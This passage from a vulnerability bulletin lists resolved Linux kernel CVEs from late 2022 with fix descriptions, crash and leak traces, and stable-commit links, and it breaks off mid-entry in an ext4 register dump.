| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: marvell/octeontx - prevent integer overflows The "code_length" value comes from the firmware file. If your firmware is untrusted, realistically there is probably very little you can do to protect yourself. Still, we try to limit the damage as much as possible. Also, Smatch marks any data read from the filesystem as untrusted and prints warnings if it is not capped correctly. The "code_length * 2" can overflow. The round_up(ucode_size, 16) + sizeof() expression can overflow too. Prevent these overflows. | 2025-12-24 | not yet calculated | CVE-2022-50763 | https://git.kernel.org/stable/c/7bfa7d67735381715c98091194e81e7685f9b7db https://git.kernel.org/stable/c/12acfa1059ad69aa352ddb2bf23ba1b831aff15f https://git.kernel.org/stable/c/8f5eee162e55175d9dac98b5e9b8da76449d2257 https://git.kernel.org/stable/c/e7ff7a46baafd38d7ed45604397e650d61f5db8d https://git.kernel.org/stable/c/caca37cf6c749ff0303f68418cfe7b757a4e0697 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6/sit: use DEV_STATS_INC() to avoid data-races syzbot/KCSAN reported that multiple cpus are updating dev->stats.tx_error concurrently. This is because sit tunnels are NETIF_F_LLTX, meaning their ndo_start_xmit() is not protected by a spinlock. While original KCSAN report was about tx path, rx path has the same issue. | 2025-12-24 | not yet calculated | CVE-2022-50764 | https://git.kernel.org/stable/c/222cc04356984f3f98acfa756a69d4bed7c501ac https://git.kernel.org/stable/c/4eed93bb3e57b8cc78d17166a14e40a73276015a https://git.kernel.org/stable/c/207501a986831174df09a36a8cb62a28f92f0dc8 https://git.kernel.org/stable/c/cb34b7cf17ecf33499c9298943f85af247abc1e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RISC-V: kexec: Fix memory leak of elf header buffer This is reported by the kmemleak detector: unreferenced object 0xff2000000403d000 (size 4096): comm "kexec", pid 146, jiffies 4294900633 (age 64.792s) hex dump (first 32 bytes): 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 .ELF............ 04 00 f3 00 01 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [<00000000566ca97c>] kmemleak_vmalloc+0x3c/0xbe [<00000000979283d8>] __vmalloc_node_range+0x3ac/0x560 [<00000000b4b3712a>] __vmalloc_node+0x56/0x62 [<00000000854f75e2>] vzalloc+0x2c/0x34 [<00000000e9a00db9>] crash_prepare_elf64_headers+0x80/0x30c [<0000000067e8bf48>] elf_kexec_load+0x3e8/0x4ec [<0000000036548e09>] kexec_image_load_default+0x40/0x4c [<0000000079fbe1b4>] sys_kexec_file_load+0x1c4/0x322 [<0000000040c62c03>] ret_from_syscall+0x0/0x2 In elf_kexec_load(), a buffer is allocated via vzalloc() to store elf headers. However, it is not freed back to the system when the kdump kernel is reloaded or unloaded, or when image->elf_header is successfully set and loading the kdump kernel then fails for some reason. Fix it by freeing the buffer in arch_kimage_file_post_load_cleanup(). | 2025-12-24 | not yet calculated | CVE-2022-50765 | https://git.kernel.org/stable/c/090bfcfc9f14d05154893c67eeaecc56e894fbae https://git.kernel.org/stable/c/cdea2da6787583ecca43594132533a2ac8d7cd21 https://git.kernel.org/stable/c/cbc32023ddbdf4baa3d9dc513a2184a84080a5a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: set generation before calling btrfs_clean_tree_block in btrfs_init_new_buffer syzbot is reporting uninit-value in btrfs_clean_tree_block() [1], for commit bc877d285ca3dba2 ("btrfs: Deduplicate extent_buffer init code") missed that btrfs_set_header_generation() in btrfs_init_new_buffer() must not be moved to after clean_tree_block() because clean_tree_block() is calling btrfs_header_generation() since commit 55c69072d6bd5be1 ("Btrfs: Fix extent_buffer usage when nodesize != leafsize"). Since memzero_extent_buffer() will reset "struct btrfs_header" part, we can't move btrfs_set_header_generation() to before memzero_extent_buffer(). Just re-add btrfs_set_header_generation() before btrfs_clean_tree_block(). | 2025-12-24 | not yet calculated | CVE-2022-50766 | https://git.kernel.org/stable/c/0a408c6212c16b9a2a1141d3c531247582ef8101 https://git.kernel.org/stable/c/a687c2890fe4a2acaac6941fa4097a1264d8f3eb https://git.kernel.org/stable/c/89bc41c92d10b905c60f6ec13c9ef664a3555c54 https://git.kernel.org/stable/c/cbddcc4fa3443fe8cfb2ff8e210deb1f6a0eea38 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: smscufx: Fix several use-after-free bugs Several types of UAFs can occur when physically removing a USB device. Add the ufx_ops_destroy() function to .fb_destroy of fb_ops; in this function there is a kref_put() that finally calls ufx_free(). This fix prevents multiple UAFs. | 2025-12-24 | not yet calculated | CVE-2022-50767 | https://git.kernel.org/stable/c/6f2075ea883e5d7730d0c9ebb1bb8e7a1a7e953f https://git.kernel.org/stable/c/3f40852d671072836fb7ae331a1f28a24223c4e8 https://git.kernel.org/stable/c/70faf9d9b6cc74418716bbf76fe75bd2da10ad4a https://git.kernel.org/stable/c/5385af2f89bc352fb70753ab41b2bb036190141f https://git.kernel.org/stable/c/d9ddfeb01fb95ffbbc7031d46a5ee2a5e45cbb86 https://git.kernel.org/stable/c/cc6a7249842fceda7574ceb63275a2d5e99d2862 https://git.kernel.org/stable/c/8d924b262f3178a9b17c17d4306a9f426c508bd9 https://git.kernel.org/stable/c/cc67482c9e5f2c80d62f623bcc347c29f9f648e1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: smartpqi: Correct device removal for multi-actuator devices Correct device count for multi-actuator drives which can cause kernel panics. | 2025-12-24 | not yet calculated | CVE-2022-50768 | https://git.kernel.org/stable/c/e8e9e0c28901d34beb193b5ece52eb7c656f4042 https://git.kernel.org/stable/c/d1c8b86b4ab7e8588a8cfadbdd6f20adbb15c938 https://git.kernel.org/stable/c/cc9befcbbb5ebce77726f938508700d913530035 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: mxcmmc: fix return value check of mmc_add_host() mmc_add_host() may return an error; if we ignore its return value, the memory allocated in mmc_alloc_host() will be leaked, and it will lead to a kernel crash because a device that was never added is deleted in the remove path. So fix this by checking the return value and going to the error path, which will call mmc_free_host(). | 2025-12-24 | not yet calculated | CVE-2022-50769 | https://git.kernel.org/stable/c/5f35c038c9f4d258b3cf77885a2730f1417d63e7 https://git.kernel.org/stable/c/1cf0c1e58738b97e2de207846105b6a5d46622ee https://git.kernel.org/stable/c/b8bdb3fd13d5cd1e86d22fd3f803a742fd88af89 https://git.kernel.org/stable/c/32eb502c972dfc34413c9147418b3d94d870c2b8 https://git.kernel.org/stable/c/3904eb97bb78fdca3e16d30a38ce5697b9686110 https://git.kernel.org/stable/c/2d496050ded83b13b16f05e1fc0329b0210d2493 https://git.kernel.org/stable/c/d37474ab9a79149075f0823315c6d45dd983a78c https://git.kernel.org/stable/c/d2ead18bc7cc166220cab5a744a05c5b69431a12 https://git.kernel.org/stable/c/cde600af7b413c9fe03e85c58c4279df90e91d13 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ocfs2: fix memory leak in ocfs2_mount_volume() There is a memory leak reported by kmemleak: unreferenced object 0xffff88810cc65e60 (size 32): comm "mount.ocfs2", pid 23753, jiffies 4302528942 (age 34735.105s) hex dump (first 32 bytes): 10 00 00 00 00 00 00 00 00 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 ................ backtrace: [<ffffffff8170f73d>] __kmalloc+0x4d/0x150 [<ffffffffa0ac3f51>] ocfs2_compute_replay_slots+0x121/0x330 [ocfs2] [<ffffffffa0b65165>] ocfs2_check_volume+0x485/0x900 [ocfs2] [<ffffffffa0b68129>] ocfs2_mount_volume.isra.0+0x1e9/0x650 [ocfs2] [<ffffffffa0b7160b>] ocfs2_fill_super+0xe0b/0x1740 [ocfs2] [<ffffffff818e1fe2>] mount_bdev+0x312/0x400 [<ffffffff819a086d>] legacy_get_tree+0xed/0x1d0 [<ffffffff818de82d>] vfs_get_tree+0x7d/0x230 [<ffffffff81957f92>] path_mount+0xd62/0x1760 [<ffffffff81958a5a>] do_mount+0xca/0xe0 [<ffffffff81958d3c>] __x64_sys_mount+0x12c/0x1a0 [<ffffffff82f26f15>] do_syscall_64+0x35/0x80 [<ffffffff8300006a>] entry_SYSCALL_64_after_hwframe+0x46/0xb0 This call stack is related to two problems. Firstly, the ocfs2 super uses "replay_map" to trace online/offline slots, in order to recover offline slots during recovery and mount. But when ocfs2_truncate_log_init() returns an error in ocfs2_mount_volume(), the memory of "replay_map" will not be freed in the error handling path. Secondly, the memory of "replay_map" will not be freed if d_make_root() returns an error in ocfs2_fill_super(). But the memory of "replay_map" will be freed normally when completing recovery and mount in ocfs2_complete_mount_recovery(). Fix the first problem by adding an error handling path to free "replay_map" when ocfs2_truncate_log_init() fails. And fix the second problem by calling ocfs2_free_replay_slots(osb) in the error handling path "out_dismount". In addition, since ocfs2_free_replay_slots() is static, it is necessary to remove its static attribute and declare it in a header file. | 2025-12-24 | not yet calculated | CVE-2022-50770 | https://git.kernel.org/stable/c/7ef516888c4d30ae41bfcd79e7077d86d92794c5 https://git.kernel.org/stable/c/2b7e59ed2e77136e9360274f8f0fc208a003e95c https://git.kernel.org/stable/c/8059e200259e9c483d715fc2df6340c227c3e196 https://git.kernel.org/stable/c/4efe1d2db731bad19891e2fb9b338724b1f598cc https://git.kernel.org/stable/c/50ab0ca3aff4da26037113d69f5a756d8c1a92cd https://git.kernel.org/stable/c/ce2fcf1516d674a174d9b34d1e1024d64de9fba3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rcu: Fix __this_cpu_read() lockdep warning in rcu_force_quiescent_state() Running rcutorture with non-zero fqs_duration module parameter in a kernel built with CONFIG_PREEMPTION=y results in the following splat: BUG: using __this_cpu_read() in preemptible [00000000] code: rcu_torture_fqs/398 caller is __this_cpu_preempt_check+0x13/0x20 CPU: 3 PID: 398 Comm: rcu_torture_fqs Not tainted 6.0.0-rc1-yoctodev-standard+ Call Trace: <TASK> dump_stack_lvl+0x5b/0x86 dump_stack+0x10/0x16 check_preemption_disabled+0xe5/0xf0 __this_cpu_preempt_check+0x13/0x20 rcu_force_quiescent_state.part.0+0x1c/0x170 rcu_force_quiescent_state+0x1e/0x30 rcu_torture_fqs+0xca/0x160 ? rcu_torture_boost+0x430/0x430 kthread+0x192/0x1d0 ? kthread_complete_and_exit+0x30/0x30 ret_from_fork+0x22/0x30 </TASK> The problem is that rcu_force_quiescent_state() uses __this_cpu_read() in preemptible code instead of the proper raw_cpu_read(). This commit therefore changes __this_cpu_read() to raw_cpu_read(). | 2025-12-24 | not yet calculated | CVE-2022-50771 | https://git.kernel.org/stable/c/3d92527a919edd1aa381bdd6c299dd75a8167396 https://git.kernel.org/stable/c/5a52380b8193cf8be6c4a6b94b86ef64ed80c0dc https://git.kernel.org/stable/c/98a5b1265a36e9d843a51ddd6c9fa02da50d2c57 https://git.kernel.org/stable/c/a74af9b937707b42c3fd041aae1ed4ce2f337307 https://git.kernel.org/stable/c/80a3e7ab477b3655615fc1627c88c248d4ad28d9 https://git.kernel.org/stable/c/ceb1c8c9b8aa9199da46a0f29d2d5f08d9b44c15 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netdevsim: fix memory leak in nsim_bus_dev_new() If device_register() failed in nsim_bus_dev_new(), the value of reference in nsim_bus_dev->dev is 1. obj->name in nsim_bus_dev->dev will not be released. unreferenced object 0xffff88810352c480 (size 16): comm "echo", pid 5691, jiffies 4294945921 (age 133.270s) hex dump (first 16 bytes): 6e 65 74 64 65 76 73 69 6d 31 00 00 00 00 00 00 netdevsim1...... backtrace: [<000000005e2e5e26>] __kmalloc_node_track_caller+0x3a/0xb0 [<0000000094ca4fc8>] kvasprintf+0xc3/0x160 [<00000000aad09bcc>] kvasprintf_const+0x55/0x180 [<000000009bac868d>] kobject_set_name_vargs+0x56/0x150 [<000000007c1a5d70>] dev_set_name+0xbb/0xf0 [<00000000ad0d126b>] device_add+0x1f8/0x1cb0 [<00000000c222ae24>] new_device_store+0x3b6/0x5e0 [<0000000043593421>] bus_attr_store+0x72/0xa0 [<00000000cbb1833a>] sysfs_kf_write+0x106/0x160 [<00000000d0dedb8a>] kernfs_fop_write_iter+0x3a8/0x5a0 [<00000000770b66e2>] vfs_write+0x8f0/0xc80 [<0000000078bb39be>] ksys_write+0x106/0x210 [<00000000005e55a4>] do_syscall_64+0x35/0x80 [<00000000eaa40bbc>] entry_SYSCALL_64_after_hwframe+0x46/0xb0 | 2025-12-24 | not yet calculated | CVE-2022-50772 | https://git.kernel.org/stable/c/77579e4065295071fbd9662f03430dca5b50b086 https://git.kernel.org/stable/c/cf2010aa1c739bab067cbc90b690d28eaa0b47da |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: mts64: fix possible null-ptr-defer in snd_mts64_interrupt I got a null-ptr-defer error report when I do the following tests on the qemu platform: make defconfig and CONFIG_PARPORT=m, CONFIG_PARPORT_PC=m, CONFIG_SND_MTS64=m Then making test scripts: cat>test_mod1.sh<<EOF modprobe snd-mts64 modprobe snd-mts64 EOF Executing the script, perhaps several times, we will get a null-ptr-defer report, as follows: syzkaller:~# ./test_mod.sh snd_mts64: probe of snd_mts64.0 failed with error -5 modprobe: ERROR: could not insert 'snd_mts64': No such device BUG: kernel NULL pointer dereference, address: 0000000000000000 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page PGD 0 P4D 0 Oops: 0002 [#1] PREEMPT SMP PTI CPU: 0 PID: 205 Comm: modprobe Not tainted 6.1.0-rc8-00588-g76dcd734eca2 #6 Call Trace: <IRQ> snd_mts64_interrupt+0x24/0xa0 [snd_mts64] parport_irq_handler+0x37/0x50 [parport] __handle_irq_event_percpu+0x39/0x190 handle_irq_event_percpu+0xa/0x30 handle_irq_event+0x2f/0x50 handle_edge_irq+0x99/0x1b0 __common_interrupt+0x5d/0x100 common_interrupt+0xa0/0xc0 </IRQ> <TASK> asm_common_interrupt+0x22/0x40 RIP: 0010:_raw_write_unlock_irqrestore+0x11/0x30 parport_claim+0xbd/0x230 [parport] snd_mts64_probe+0x14a/0x465 [snd_mts64] platform_probe+0x3f/0xa0 really_probe+0x129/0x2c0 __driver_probe_device+0x6d/0xc0 driver_probe_device+0x1a/0xa0 __device_attach_driver+0x7a/0xb0 bus_for_each_drv+0x62/0xb0 __device_attach+0xe4/0x180 bus_probe_device+0x82/0xa0 device_add+0x550/0x920 platform_device_add+0x106/0x220 snd_mts64_attach+0x2e/0x80 [snd_mts64] port_check+0x14/0x20 [parport] bus_for_each_dev+0x6e/0xc0 __parport_register_driver+0x7c/0xb0 [parport] snd_mts64_module_init+0x31/0x1000 [snd_mts64] do_one_initcall+0x3c/0x1f0 do_init_module+0x46/0x1c6 load_module+0x1d8d/0x1e10 __do_sys_finit_module+0xa2/0xf0 do_syscall_64+0x37/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd </TASK> Kernel panic - not syncing: Fatal exception in interrupt Rebooting in 1 seconds.. The mts was not initialized during the interrupt; we add a check for mts to fix this bug. | 2025-12-24 | not yet calculated | CVE-2022-50773 | https://git.kernel.org/stable/c/06ec592389f2be3199779ab823c4323dcfd2121f https://git.kernel.org/stable/c/b471fe61da523a15e4cb60fa81f5a2377e4bad98 https://git.kernel.org/stable/c/7e91667db38abb056da5a496d40fbd044c66bed2 https://git.kernel.org/stable/c/c7e9624d90bf20f1eed6b228949396d614b94020 https://git.kernel.org/stable/c/0649129359219ce6ff380ec401f87308485c6ae3 https://git.kernel.org/stable/c/cba633b24a98d957e8190ef8bc4d4cdb4f6e9313 https://git.kernel.org/stable/c/1a763c748acd5540ccc43306c57c9c6c5fb60884 https://git.kernel.org/stable/c/250eed7b9994d79f9c409f954dbd08e88f5afd83 https://git.kernel.org/stable/c/cf2ea3c86ad90d63d1c572b43e1ca9276b0357ad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: qat - fix DMA transfer direction When CONFIG_DMA_API_DEBUG is selected, while running the crypto self test on the QAT crypto algorithms, the function add_dma_entry() reports a warning similar to the one below, saying that overlapping mappings are not supported. This occurs in tests where the input and the output scatter list point to the same buffers (i.e. two different scatter lists which point to the same chunks of memory). The logic that implements the mapping uses the flag DMA_BIDIRECTIONAL for both the input and the output scatter lists which leads to overlapped write mappings. These are not supported by the DMA layer. Fix by specifying the correct DMA transfer directions when mapping buffers. For in-place operations where the input scatter list matches the output scatter list, buffers are mapped once with DMA_BIDIRECTIONAL, otherwise input buffers are mapped using the flag DMA_TO_DEVICE and output buffers are mapped with DMA_FROM_DEVICE. Overlapping a read mapping with a write mapping is a valid case in dma-coherent devices like QAT. The function that frees and unmaps the buffers, qat_alg_free_bufl(), has been changed in accordance with the changes to the mapping function. DMA-API: 4xxx 0000:06:00.0: cacheline tracking EEXIST, overlapping mappings aren't supported WARNING: CPU: 53 PID: 4362 at kernel/dma/debug.c:570 add_dma_entry+0x1e9/0x270 ... Call Trace: dma_map_page_attrs+0x82/0x2d0 ? preempt_count_add+0x6a/0xa0 qat_alg_sgl_to_bufl+0x45b/0x990 [intel_qat] qat_alg_aead_dec+0x71/0x250 [intel_qat] crypto_aead_decrypt+0x3d/0x70 test_aead_vec_cfg+0x649/0x810 ? number+0x310/0x3a0 ? vsnprintf+0x2a3/0x550 ? scnprintf+0x42/0x70 ? valid_sg_divisions.constprop.0+0x86/0xa0 ? test_aead_vec+0xdf/0x120 test_aead_vec+0xdf/0x120 alg_test_aead+0x185/0x400 alg_test+0x3d8/0x500 ? crypto_acomp_scomp_free_ctx+0x30/0x30 ? __schedule+0x32a/0x12a0 ? ttwu_queue_wakelist+0xbf/0x110 ? _raw_spin_unlock_irqrestore+0x23/0x40 ? try_to_wake_up+0x83/0x570 ? _raw_spin_unlock_irqrestore+0x23/0x40 ? __set_cpus_allowed_ptr_locked+0xea/0x1b0 ? crypto_acomp_scomp_free_ctx+0x30/0x30 cryptomgr_test+0x27/0x50 kthread+0xe6/0x110 ? kthread_complete_and_exit+0x20/0x20 ret_from_fork+0x1f/0x30 | 2025-12-24 | not yet calculated | CVE-2022-50774 | https://git.kernel.org/stable/c/426d5bc089e7731e36b514d1beca19e777a2d653 https://git.kernel.org/stable/c/1f1ab76e251521bd2fa5244473efcf663792745d https://git.kernel.org/stable/c/429348d4f675e9eb418d0829064c4d7d06bd66a3 https://git.kernel.org/stable/c/c4c9d9edf4848aed89516b23b88950b194beff6a https://git.kernel.org/stable/c/cf5bb835b7c8a5fee7f26455099cca7feb57f5e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/hns: Fix refcount leak in hns_roce_mmap rdma_user_mmap_entry_get_pgoff() takes the reference. Add missing rdma_user_mmap_entry_put() to release the reference. Acked-by Haoyue Xu <xuhaoyue1@hisilicon.com> | 2025-12-24 | not yet calculated | CVE-2022-50775 | https://git.kernel.org/stable/c/fa87cf2e756efe809ee8683d4f282f4de962dab6 https://git.kernel.org/stable/c/8abd2ff2256a2a99c11c7ecdcb5512429933620f https://git.kernel.org/stable/c/cf6a05c8494a8ae7fec8e5f1229b45ca5b4bcd30 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: st: Fix memory leak in st_of_quadfs_setup() If st_clk_register_quadfs_pll() fails, @lock should be freed before goto @err_exit, otherwise it will cause a memory leak issue. Fix it. | 2025-12-24 | not yet calculated | CVE-2022-50776 | https://git.kernel.org/stable/c/081538ae5817631a2b99e8e75cce981060aab29f https://git.kernel.org/stable/c/f0295209de457049a4a5f3e3985528391bd1ab34 https://git.kernel.org/stable/c/be03875007621fcee96e6f9fd7b9e59c8dfcf6fa https://git.kernel.org/stable/c/713ad301c2d49e88fe586b57ebac8f220a98e162 https://git.kernel.org/stable/c/efd025f32fce27a8ada9bcb4731e8a84476e5b3d https://git.kernel.org/stable/c/adf6a00859d014cecf046dc91f75c0e65a544360 https://git.kernel.org/stable/c/335ef7546c77e63154d6ea4d603b11274a85900e https://git.kernel.org/stable/c/f4731395d6db850127634197863aede188d8e9de https://git.kernel.org/stable/c/cfd3ffb36f0d566846163118651d868e607300ba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: phy: xgmiitorgmii: Fix refcount leak in xgmiitorgmii_probe of_phy_find_device() returns a device node with its refcount incremented. Call put_device() to release it when it is not needed anymore. | 2025-12-24 | not yet calculated | CVE-2022-50777 | https://git.kernel.org/stable/c/53526dbc8aa6b95e9fc2ab1e29b1a9145721da24 https://git.kernel.org/stable/c/78b0b1ff525d9be4babf5a148a4de0d50042d95d https://git.kernel.org/stable/c/00616bd1913a4f879679e02dc08c2f501ca2bd4c https://git.kernel.org/stable/c/106d0d33c9d1ec4ddeeffc1fdc717ff09953d4ed https://git.kernel.org/stable/c/4d112f001612c79927c1ecf29522b34c4fa292e0 https://git.kernel.org/stable/c/52841e71253e6ace72751c72560950474a57d04c https://git.kernel.org/stable/c/ee84d37a5f08ed1121cdd16f8f3ed87552087a21 https://git.kernel.org/stable/c/d039535850ee47079d59527e96be18d8e0daa84b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fortify: Fix __compiletime_strlen() under UBSAN_BOUNDS_LOCAL With CONFIG_FORTIFY=y and CONFIG_UBSAN_LOCAL_BOUNDS=y enabled, we observe a runtime panic while running Android's Compatibility Test Suite's (CTS) android.hardware.input.cts.tests. This is stemming from a strlen() call in hidinput_allocate(). __compiletime_strlen() is implemented in terms of __builtin_object_size(), then does an array access to check for NUL-termination. A quirk of __builtin_object_size() is that for strings whose values are runtime dependent, __builtin_object_size(str, 1 or 0) returns the maximum size of possible values when those sizes are determinable at compile time. Example: static const char *v = "FOO BAR"; static const char *y = "FOO BA"; unsigned long x (int z) { // Returns 8, which is: // max(__builtin_object_size(v, 1), __builtin_object_size(y, 1)) return __builtin_object_size(z ? v : y, 1); } So when FORTIFY_SOURCE is enabled, the current implementation of __compiletime_strlen() will try to access beyond the end of y at runtime using the size of v. Mixed with UBSAN_LOCAL_BOUNDS we get a fault. hidinput_allocate() has a local C string whose value is control flow dependent on a switch statement, so __builtin_object_size(str, 1) evaluates to the maximum string length, making all other cases fault on the last character check. hidinput_allocate() could be cleaned up to avoid runtime calls to strlen() since the local variable can only have literal values, so there's no benefit to trying to fortify the strlen call site there. Perform a __builtin_constant_p() check against index 0 earlier in the macro to filter out the control-flow-dependent case. Add a KUnit test for checking the expected behavioral characteristics of FORTIFY_SOURCE internals. | 2025-12-24 | not yet calculated | CVE-2022-50778 | https://git.kernel.org/stable/c/ed42391164e6839a48aaf4c53eefda516835e799 https://git.kernel.org/stable/c/5d59ad2bfb35fccfe2ad5e8bb8801f6224d3f7d4 https://git.kernel.org/stable/c/d07c0acb4f41cc42a0d97530946965b3e4fa68c1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: orangefs: Fix kmemleak in orangefs_prepare_debugfs_help_string() When inserting and removing the orangefs module, debug_help_string will be leaked: unreferenced object 0xffff8881652ba000 (size 4096): comm "insmod", pid 1701, jiffies 4294893639 (age 13218.530s) hex dump (first 32 bytes): 43 6c 69 65 6e 74 20 44 65 62 75 67 20 4b 65 79 Client Debug Key 77 6f 72 64 73 20 61 72 65 20 75 6e 6b 6e 6f 77 words are unknow backtrace: [<0000000004e6f8e3>] kmalloc_trace+0x27/0xa0 [<0000000006f75d85>] orangefs_prepare_debugfs_help_string+0x5e/0x480 [orangefs] [<0000000091270a2a>] _sub_I_65535_1+0x57/0xf70 [crc_itu_t] [<000000004b1ee1a3>] do_one_initcall+0x87/0x2a0 [<000000001d0614ae>] do_init_module+0xdf/0x320 [<00000000efef068c>] load_module+0x2f98/0x3330 [<000000006533b44d>] __do_sys_finit_module+0x113/0x1b0 [<00000000a0da6f99>] do_syscall_64+0x35/0x80 [<000000007790b19b>] entry_SYSCALL_64_after_hwframe+0x46/0xb0 When removing the module, debug_help_string should always be freed. The allocated buffer should also always be freed when changing free_debug_help_string. | 2025-12-24 | not yet calculated | CVE-2022-50779 | https://git.kernel.org/stable/c/44d3eac26a5e5268d11cc342dc202b0d31505c0a https://git.kernel.org/stable/c/f2b8a6aac561a49fe02c99683c40a8b87a9f68fc https://git.kernel.org/stable/c/ba9d3b9cec20957fd86bb1bf525b4ea8b64b2dea https://git.kernel.org/stable/c/2e7c09121064df93c58bbc49d3d0f608d3f584bd https://git.kernel.org/stable/c/b8affa0c6405ee968dcb6030bee2cf719a464752 https://git.kernel.org/stable/c/39529b79b023713d4f2d3479dc0ca43ba99df726 https://git.kernel.org/stable/c/3fc221d9a16339a913a0341d3efc7fef339073e1 https://git.kernel.org/stable/c/19be31668552a198e887762e25bdcc560800ecb4 https://git.kernel.org/stable/c/d23417a5bf3a3afc55de5442eb46e1e60458b0a1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: fix UAF issue in nfqnl_nf_hook_drop() when ops_init() failed When the ops_init() interface is invoked to initialize the net, but ops->init() fails, data is released. However, the ptr pointer in net->gen is invalid. In this case, when nfqnl_nf_hook_drop() is invoked to release the net, invalid address access occurs. The process is as follows: setup_net() ops_init() data = kzalloc(...) ---> alloc "data" net_assign_generic() ---> assign "data" to ptr in net->gen ... ops->init() ---> failed ... kfree(data); ---> ptr in net->gen is invalid ... ops_exit_list() ... nfqnl_nf_hook_drop() *q = nfnl_queue_pernet(net) ---> q is invalid The following is the Call Trace information: BUG: KASAN: use-after-free in nfqnl_nf_hook_drop+0x264/0x280 Read of size 8 at addr ffff88810396b240 by task ip/15855 Call Trace: <TASK> dump_stack_lvl+0x8e/0xd1 print_report+0x155/0x454 kasan_report+0xba/0x1f0 nfqnl_nf_hook_drop+0x264/0x280 nf_queue_nf_hook_drop+0x8b/0x1b0 __nf_unregister_net_hook+0x1ae/0x5a0 nf_unregister_net_hooks+0xde/0x130 ops_exit_list+0xb0/0x170 setup_net+0x7ac/0xbd0 copy_net_ns+0x2e6/0x6b0 create_new_namespaces+0x382/0xa50 unshare_nsproxy_namespaces+0xa6/0x1c0 ksys_unshare+0x3a4/0x7e0 __x64_sys_unshare+0x2d/0x40 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x46/0xb0 </TASK> Allocated by task 15855: kasan_save_stack+0x1e/0x40 kasan_set_track+0x21/0x30 __kasan_kmalloc+0xa1/0xb0 __kmalloc+0x49/0xb0 ops_init+0xe7/0x410 setup_net+0x5aa/0xbd0 copy_net_ns+0x2e6/0x6b0 create_new_namespaces+0x382/0xa50 unshare_nsproxy_namespaces+0xa6/0x1c0 ksys_unshare+0x3a4/0x7e0 __x64_sys_unshare+0x2d/0x40 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x46/0xb0 Freed by task 15855: kasan_save_stack+0x1e/0x40 kasan_set_track+0x21/0x30 kasan_save_free_info+0x2a/0x40 ____kasan_slab_free+0x155/0x1b0 slab_free_freelist_hook+0x11b/0x220 __kmem_cache_free+0xa4/0x360 ops_init+0xb9/0x410 setup_net+0x5aa/0xbd0 copy_net_ns+0x2e6/0x6b0 create_new_namespaces+0x382/0xa50 unshare_nsproxy_namespaces+0xa6/0x1c0 ksys_unshare+0x3a4/0x7e0 __x64_sys_unshare+0x2d/0x40 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x46/0xb0 | 2025-12-24 | not yet calculated | CVE-2022-50780 | https://git.kernel.org/stable/c/5a2ea549be94924364f6911227d99be86e8cf34a https://git.kernel.org/stable/c/97ad240fd9aa9214497d14af2b91608e20856cac https://git.kernel.org/stable/c/c3edc6e808209aa705185f732e682a370981ced1 https://git.kernel.org/stable/c/a1e18acb0246bfb001b08b8b1b830b5ec92a0f13 https://git.kernel.org/stable/c/4a4df5e78712de39d6f90d6a64b5eb48dca03bd5 https://git.kernel.org/stable/c/d266935ac43d57586e311a087510fe6a084af742 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: amdgpu/pm: prevent array underflow in vega20_odn_edit_dpm_table() In the PP_OD_EDIT_VDDC_CURVE case the "input_index" variable is capped at 2 but not checked for negative values so it results in an out of bounds read. This value comes from the user via sysfs. | 2025-12-24 | not yet calculated | CVE-2022-50781 | https://git.kernel.org/stable/c/4d3dc0de9c46d9f73be6bac026e40b893e37ea21 https://git.kernel.org/stable/c/85273b4a7076ed5328c8ace02234e4e7e10972d5 https://git.kernel.org/stable/c/f289a38df0da4cfe4b50d04b1b9c3bc646fecd57 https://git.kernel.org/stable/c/a03625ad11b50429930f4c491d6c97e70f2ba89a https://git.kernel.org/stable/c/8084bd0a64e278314b733993f388d83a86aa1183 https://git.kernel.org/stable/c/d27252b5706e51188aed7647126e44dcf9e940c1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix bug_on in __es_tree_search caused by bad quota inode We got an issue as follows: ================================================================== kernel BUG at fs/ext4/extents_status.c:202! invalid opcode: 0000 [#1] PREEMPT SMP CPU: 1 PID: 810 Comm: mount Not tainted 6.1.0-rc1-next-g9631525255e3 #352 RIP: 0010:__es_tree_search.isra.0+0xb8/0xe0 RSP: 0018:ffffc90001227900 EFLAGS: 00010202 RAX: 0000000000000000 RBX: 0000000077512a0f RCX: 0000000000000000 RDX: 0000000000000002 RSI: 0000000000002a10 RDI: ffff8881004cd0c8 RBP: ffff888177512ac8 R08: 47ffffffffffffff R09: 0000000000000001 R10: 0000000000000001 R11: 00000000000679af R12: 0000000000002a10 R13: ffff888177512d88 R14: 0000000077512a10 R15: 0000000000000000 FS: 00007f4bd76dbc40(0000)GS:ffff88842fd00000(0000)knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00005653bf993cf8 CR3: 000000017bfdf000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 